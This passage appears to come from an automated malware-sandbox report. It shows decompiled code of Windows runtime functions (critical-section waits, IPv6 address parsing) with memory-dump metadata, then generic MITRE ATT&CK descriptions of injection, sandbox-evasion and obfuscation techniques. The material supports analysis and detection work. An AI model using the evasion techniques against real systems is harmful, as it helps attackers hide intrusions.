										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E02083915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E0203F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E02083915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E0203F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E02083915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E02065329(_t74, _t92);
													_push(1);
													return E020653A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

0x020653ab
0x020653ae
0x020653b1
0x020653b4
0x020653b7
0x020805b6
0x020805c0
0x020805c3
0x00000000
0x020805c9
0x020805c9
0x020805cc
0x020805d5
0x020805d5
0x020653bd
0x020653bd
0x020653bd
0x020653be
0x020653be
0x020653be
0x020653c0
0x00000000
0x00000000
0x020a2269
0x020a226d
0x020a2349
0x020a234d
0x020a2273
0x020a2276
0x020a2279
0x020a227e
0x020a2283
0x020a2287
0x020a228a
0x020a228d
0x020a228f
0x020a22bc
0x020a22bc
0x020a22bc
0x020a22be
0x020a22c4
0x020a22cc
0x020a22d0
0x020a22d6
0x020a22d7
0x020a22da
0x020a22df
0x020a22e4
0x00000000
0x00000000
0x020a22e6
0x020a22e9
0x020a22f4
0x020a22f9
0x020a22fa
0x020a2305
0x020a2314
0x020a2319
0x020a231a
0x020a231d
0x020a2320
0x020a2323
0x020a2323
0x020a2328
0x020a232d
0x020a232f
0x020a2331
0x020a2336
0x020a2336
0x020a233b
0x020a233d
0x020a2350
0x020a2351
0x020a2356
0x020a2359
0x020a2359
0x020a235b
0x020a235d
0x02065367
0x0206536b
0x02065372
0x00000000
0x00000000
0x00000000
0x00000000
0x020a2363
0x020a2363
0x020a2369
0x020a236a
0x020a236c
0x020a2371
0x020a2373
0x00000000
0x020a2379
0x020a2379
0x020a237a
0x020a237f
0x020a237f
0x020a2385
0x020a2386
0x020a2389
0x020a238e
0x020a2390
0x02065378
0x0206537c
0x020a2396
0x020a2396
0x020a2397
0x020a239c
0x020a23a2
0x020a23a3
0x020a23a6
0x020a23ab
0x020a23ad
0x00000000
0x020a23b3
0x020a23b3
0x020a23b4
0x020a23b9
0x020a23ba
0x020a23ba
0x020a23bc
0x020a23bf
0x00000000
0x00000000
0x02099153
0x02099158
0x0209915a
0x0209915e
0x02099160
0x00000000
0x02099166
0x02099166
0x02099171
0x02099176
0x02099176
0x00000000
0x02099160
0x020a23c6
0x020a23cb
0x020a23d7
0x020a23d7
0x020a23ad
0x020a2390
0x020a2373
0x020a233f
0x020a233f
0x00000000
0x020a233f
0x020a2291
0x020a2291
0x020a2293
0x020a2295
0x020a229a
0x020a22a1
0x020a22a3
0x020a22a7
0x020a22a9
0x00000000
0x00000000
0x020a22ab
0x020a22ad
0x020a22af
0x00000000
0x00000000
0x00000000
0x020a22af
0x020a22b1
0x020a22b4
0x020a22b4
0x020a22b6
0x00000000
0x00000000
0x00000000
0x00000000
0x020a22b6
0x020a228f
0x00000000
0x020a226d
0x020653cb
0x020653ce
0x020653d0
0x020653d4
0x020653d6
0x00000000
0x020653d8
0x020653e3
0x020653ea
0x020653ea
0x020653d6
0x00000000

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 020A22F4

Strings

RTL: Resource at %p, xrefs: 020A230B
RTL: Re-Waiting, xrefs: 020A2328
RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 020A22FC

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
API String ID: 885266447-871070163
Opcode ID: 5c8d0ce97e0b0500eb755a49fb3f0266251c50af4b9ff7ee6d8d3befb40252ab
Instruction ID: dfe639186b1f823171edeac7e950fdecef51256fba8aec24e256b7714496b38b
Opcode Fuzzy Hash: 5c8d0ce97e0b0500eb755a49fb3f0266251c50af4b9ff7ee6d8d3befb40252ab
Instruction Fuzzy Hash: 6D5117716003126FEB16EB64CCD4FEB73D9AF54724F104269FD45DB280EB61E841ABA0

Uniqueness

Uniqueness Score: -1.00%

Function 0206EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E0206EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E0205DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0x212793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E020416C0(_t39);
				} else {
					_t40 = E0203F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E02083915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E020401A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0x212793c; // 0x0
								_push(_t85);
								_t44 = E02041F28(_t71);
							} else {
								_t44 = E0203F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E02083915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E020C2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E0206EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E02084FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E02093F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E02093F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0x21220c0;
								if(_t85 != 0x21220c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E020C217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E02093F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

0x0206ec56
0x0206ec56
0x0206ec56
0x0206ec5c
0x0206ec64
0x020a23e6
0x020a23eb
0x020a23eb
0x0206ec6a
0x0206ec6c
0x0206ec6f
0x020a23f3
0x020a23f8
0x020a23fa
0x020a23fc
0x0206ec75
0x0206ec76
0x0206ec76
0x0206ec7b
0x0206ec7c
0x0206ec7e
0x020a2406
0x020a2407
0x020a240c
0x020a240d
0x020a240d
0x020a240d
0x020a2414
0x020a2417
0x020a241e
0x020a2435
0x020a2438
0x020a243c
0x020a243f
0x020a2442
0x020a2443
0x020a2446
0x020a2449
0x020a2453
0x020a2455
0x020a245b
0x020a245b
0x0206eb99
0x0206eb99
0x0206eb9c
0x0206eb9d
0x0206eb9f
0x0206eba2
0x020a2465
0x020a246b
0x020a246d
0x0206eba8
0x0206eba9
0x0206eba9
0x0206ebae
0x0206ebb3
0x0206ebb9
0x0206ebbb
0x020a2513
0x020a2514
0x020a2519
0x020a251b
0x0206ec2a
0x0206ec2d
0x0206ec33
0x0206ec36
0x0206ec3a
0x0206ec3e
0x0206ec40
0x0206ec47
0x0206ec47
0x0206ec40
0x020422c6
0x0206ebc1
0x0206ebc1
0x0206ebc5
0x0206ec9a
0x0206ec9a
0x0206ebd6
0x0206ebd6
0x00000000
0x0206ebbb
0x020a2477
0x020a247c
0x020a2486
0x020a248b
0x020a2496
0x020a249b
0x020a249d
0x020a24a0
0x020a24a3
0x020a24aa
0x020a24aa
0x020a24a5
0x020a24a5
0x020a24a5
0x020a24ac
0x020a24af
0x020a24b0
0x020a24b3
0x020a24b9
0x020a24ba
0x020a24bb
0x020a24c6
0x020a24cb
0x020a24cd
0x020a24d0
0x020a24d1
0x020a24d4
0x020a24d6
0x020a24d9
0x020a24d9
0x020a24dc
0x020a24df
0x020a24e1
0x020a24e7
0x020a24e9
0x020a24ec
0x020a24ef
0x020a24f2
0x020a24f2
0x020a24ef
0x020a24e7
0x020a24fa
0x020a24ff
0x020a2501
0x020a2503
0x020a2506
0x020a250b
0x0206eb8c
0x0206eb93
0x00000000
0x00000000
0x0206eb93
0x00000000
0x0206eb99
0x0206ec85
0x0206ec85
0x0206ec85
0x00000000

Strings

RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 020A24BD
RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 020A248D
RTL: Re-Waiting, xrefs: 020A24FA

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
API String ID: 0-3177188983
Opcode ID: e97f58a9718422f2942cd944f44fce501787fd65119a01cc6c61894da0b15650
Instruction ID: b2d6be204119f841497b25b0447594fccbef4b6cf8d41274636a03fbb2cff0e2
Opcode Fuzzy Hash: e97f58a9718422f2942cd944f44fce501787fd65119a01cc6c61894da0b15650
Instruction Fuzzy Hash: 0A41B2B0600305AFDB24DBA8CC98FAF77EAAF44720F108655F9559B2C0D734E941EB60

Uniqueness

Uniqueness Score: -1.00%

Function 0207FCC9, Relevance: 6.3, APIs: 4, Instructions: 257
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0207FCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _t105;
				void* _t110;
				char _t114;
				short _t115;
				void* _t118;
				signed short* _t119;
				short _t120;
				char _t122;
				void* _t127;
				void* _t130;
				signed int _t136;
				intOrPtr _t143;
				signed int _t158;
				signed short* _t164;
				signed int _t167;
				void* _t170;

				_t158 = 0;
				_t164 = _a4;
				_v20 = 0;
				_v24 = 0;
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v28 = 0;
				_t136 = 0;
				while(1) {
					_t167 =  *_t164 & 0x0000ffff;
					if(_t167 == _t158) {
						break;
					}
					_t118 = _v20 - _t158;
					if(_t118 == 0) {
						if(_t167 == 0x3a) {
							if(_v12 > _t158 || _v8 > _t158) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									break;
								}
								_t143 = 2;
								 *((short*)(_a12 + _t136 * 2)) = 0;
								_v28 = 1;
								_v8 = _t143;
								_t136 = _t136 + 1;
								L47:
								_t164 = _t119;
								_v20 = _t143;
								L14:
								if(_v24 == _t158) {
									L19:
									_t164 =  &(_t164[1]);
									_t158 = 0;
									continue;
								}
								if(_v12 == _t158) {
									if(_v16 > 4) {
										L29:
										return 0xc000000d;
									}
									_t120 = E0207EE02(_v24, _t158, 0x10);
									_t170 = _t170 + 0xc;
									 *((short*)(_a12 + _t136 * 2)) = _t120;
									_t136 = _t136 + 1;
									goto L19;
								}
								if(_v16 > 3) {
									goto L29;
								}
								_t122 = E0207EE02(_v24, _t158, 0xa);
								_t170 = _t170 + 0xc;
								if(_t122 > 0xff) {
									goto L29;
								}
								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
								goto L19;
							}
						}
						L21:
						if(_v8 > 7 || _t167 >= 0x80) {
							break;
						} else {
							if(E0207685D(_t167, 4) == 0) {
								if(E0207685D(_t167, 0x80) != 0) {
									if(_v12 > 0) {
										break;
									}
									_t127 = 1;
									_a7 = 1;
									_v24 = _t164;
									_v20 = 1;
									_v16 = 1;
									L36:
									if(_v20 == _t127) {
										goto L19;
									}
									_t158 = 0;
									goto L14;
								}
								break;
							}
							_a7 = 0;
							_v24 = _t164;
							_v20 = 1;
							_v16 = 1;
							goto L19;
						}
					}
					_t130 = _t118 - 1;
					if(_t130 != 0) {
						if(_t130 == 1) {
							goto L21;
						}
						_t127 = 1;
						goto L36;
					}
					if(_t167 >= 0x80) {
						L7:
						if(_t167 == 0x3a) {
							_t158 = 0;
							if(_v12 > 0 || _v8 > 6) {
								break;
							} else {
								_t119 =  &(_t164[1]);
								if( *_t119 != _t167) {
									_v8 = _v8 + 1;
									L13:
									_v20 = _t158;
									goto L14;
								}
								if(_v28 != 0) {
									break;
								}
								_v28 = _v8 + 1;
								_t143 = 2;
								_v8 = _v8 + _t143;
								goto L47;
							}
						}
						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
							break;
						} else {
							_v12 = _v12 + 1;
							_t158 = 0;
							goto L13;
						}
					}
					if(E0207685D(_t167, 4) != 0) {
						_v16 = _v16 + 1;
						goto L19;
					}
					if(E0207685D(_t167, 0x80) != 0) {
						_v16 = _v16 + 1;
						if(_v12 > 0) {
							break;
						}
						_a7 = 1;
						goto L19;
					}
					goto L7;
				}
				 *_a8 = _t164;
				if(_v12 != 0) {
					if(_v12 != 3) {
						goto L29;
					}
					_v8 = _v8 + 1;
				}
				if(_v28 != 0 || _v8 == 7) {
					if(_v20 != 1) {
						if(_v20 != 2) {
							goto L29;
						}
						 *((short*)(_a12 + _t136 * 2)) = 0;
						L65:
						_t105 = _v28;
						if(_t105 != 0) {
							_t98 = (_t105 - _v8) * 2; // 0x11
							E02058980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
							_t110 = 8;
							E0204DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
						}
						return 0;
					}
					if(_v12 != 0) {
						if(_v16 > 3) {
							goto L29;
						}
						_t114 = E0207EE02(_v24, 0, 0xa);
						_t170 = _t170 + 0xc;
						if(_t114 > 0xff) {
							goto L29;
						}
						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
						goto L65;
					}
					if(_v16 > 4) {
						goto L29;
					}
					_t115 = E0207EE02(_v24, 0, 0x10);
					_t170 = _t170 + 0xc;
					 *((short*)(_a12 + _t136 * 2)) = _t115;
					goto L65;
				} else {
					goto L29;
				}
			}

0x0207fcd1
0x0207fcd6
0x0207fcd9
0x0207fcdc
0x0207fcdf
0x0207fce2
0x0207fce5
0x0207fce8
0x0207fceb
0x0207fced
0x0207fced
0x0207fcf3
0x00000000
0x00000000
0x0207fcfc
0x0207fcfe
0x0207fdc1
0x020aecbd
0x00000000
0x020aeccc
0x020aeccc
0x020aecd2
0x00000000
0x00000000
0x020aecdf
0x020aece0
0x020aece4
0x020aeceb
0x020aecee
0x020aeca8
0x020aeca8
0x020aecaa
0x0207fd76
0x0207fd79
0x0207fdb4
0x0207fdb5
0x0207fdb6
0x00000000
0x0207fdb6
0x0207fd7e
0x020aecfc
0x0207fe2f
0x00000000
0x0207fe2f
0x020aed08
0x020aed0f
0x020aed17
0x020aed1b
0x00000000
0x020aed1b
0x0207fd88
0x00000000
0x00000000
0x0207fd94
0x0207fd99
0x0207fda1
0x00000000
0x00000000
0x0207fdb0
0x00000000
0x0207fdb0
0x020aecbd
0x0207fdc7
0x0207fdcb
0x00000000
0x0207fdd7
0x0207fde3
0x0207fe06
0x02091fe7
0x00000000
0x00000000
0x02091fef
0x02091ff0
0x02091ff4
0x02091ff7
0x02091ffa
0x02091ffd
0x02092000
0x00000000
0x00000000
0x020aecf1
0x00000000
0x020aecf1
0x00000000
0x0207fe06
0x0207fde8
0x0207fdec
0x0207fdef
0x0207fdf2
0x00000000
0x0207fdf2
0x0207fdcb
0x0207fd04
0x0207fd05
0x020aec67
0x00000000
0x00000000
0x020aec6f
0x00000000
0x020aec6f
0x0207fd13
0x0207fd3c
0x0207fd40
0x020aec75
0x020aec7a
0x00000000
0x020aec8a
0x020aec8a
0x020aec90
0x020aecb2
0x0207fd73
0x0207fd73
0x00000000
0x0207fd73
0x020aec95
0x00000000
0x00000000
0x020aeca1
0x020aeca4
0x020aeca5
0x00000000
0x020aeca5
0x020aec7a
0x0207fd4a
0x00000000
0x0207fd6e
0x0207fd6e
0x0207fd71
0x00000000
0x0207fd71
0x0207fd4a
0x0207fd21
0x0208a3a1
0x00000000
0x0208a3a1
0x0207fd36
0x0209200b
0x02092012
0x00000000
0x00000000
0x02092018
0x00000000
0x02092018
0x00000000
0x0207fd36
0x0207fe0f
0x0207fe16
0x0208a3ad
0x00000000
0x00000000
0x0208a3b3
0x0208a3b3
0x0207fe1f
0x020aed25
0x020aed86
0x00000000
0x00000000
0x020aed91
0x020aed95
0x020aed95
0x020aed9a
0x020aedad
0x020aedb3
0x020aedba
0x020aedc4
0x020aedc9
0x00000000
0x020aedcc
0x020aed2a
0x020aed55
0x00000000
0x00000000
0x020aed61
0x020aed66
0x020aed6e
0x00000000
0x00000000
0x020aed7d
0x00000000
0x020aed7d
0x020aed30
0x00000000
0x00000000
0x020aed3c
0x020aed43
0x020aed4b
0x00000000
0x00000000
0x00000000
0x00000000

APIs

__fassign.LIBCMT ref: 0207FD94

Memory Dump Source

Source File: 00000009.00000002.2363188404.0000000002030000.00000040.00000001.sdmp, Offset: 02020000, based on PE: true

Associated: 00000009.00000002.2363182275.0000000002020000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363271363.0000000002110000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363277175.0000000002120000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363282413.0000000002124000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363287147.0000000002127000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363291649.0000000002130000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.2363347301.0000000002190000.00000040.00000001.sdmp Download File

Similarity

API ID: __fassign
String ID:
API String ID: 3965848254-0
Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction ID: 579f08a5fa0a002bc23f318b9c9933b515169987b1fa350ad49b2f39598415b7
Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
Instruction Fuzzy Hash: 0A919C71D0030AEADF65DF98C8487EEBBF5FF45308F20807AD415A6651E7704A81EB99

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

